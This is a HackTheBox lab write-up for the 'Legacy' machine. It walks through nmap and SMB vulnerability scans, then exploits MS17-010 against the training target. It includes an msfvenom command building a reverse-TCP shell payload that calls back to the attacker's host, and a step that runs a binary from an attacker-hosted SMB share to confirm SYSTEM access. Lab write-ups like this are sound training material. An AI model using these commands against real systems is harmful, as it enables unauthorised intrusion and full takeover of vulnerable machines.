HackTheBox Legacy Writeup

Enjoy reading my HTB Legacy Writeup

Information Gathering

Let's begin with a basic nmap scan to gather information about the services running on the target machine:

sudo nmap -p 1-5000 -sV -sC -O -v 10.10.10.4

Nmap also found out that you can connect to the Samba share using the guest account.

I tried several ways of enumerating the SMB share eg. using smbclient with the -L flag in order to list all the shares or smbmap -H 10.10.10.4 but had no success.

Next, I searched for possible vulnerabilities using nmap in combination with NSE scripts:

nmap --script smb-vuln* -p 139,445 -v 10.10.10.4 -Pn

We got two hits:

MS17-010

First, let's create a payload using msfvenom:

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.180 LPORT=4545 -f exe > payload.exe

Now we can use the send_and_execute.py script from this github repo to transfer our payload and gain a reverse shell on our netcat listener.

Our shell spawns in C:\WINDOWS\system32 so we probably have high privileges. Unfortunately, we cannot confirm them using whoami because that executable does not exist on the server. I first thought about downloading it using curl but curl wasn't recognized either.

Next, I tried it with a SMB share using the smbserver script from impacket. Using: sudo smbserver.py pubshare /home/user/Desktop I created a share that contains the whoami binary for windows.

Now on the HTB Legacy machine, I executed that executable with:

\\10.10.16.180\pubshare\whoami.exe

And that confirmed that we got nt authority\system permissions.

0C:\WINDOWS\system32>\\10.10.16.180\pubshare\whoami.exe
1\\10.10.16.180\pubshare\whoami.exe
2NT AUTHORITY\SYSTEM

Obtaining the shells

Navigate to: C:\Documents and Settings\john\Desktop to get the user flag. The root flag is located in C:\Documents and Settings\Administrator\Desktop.

Tags:

HTB, HackTheBox, Legacy, MS17-010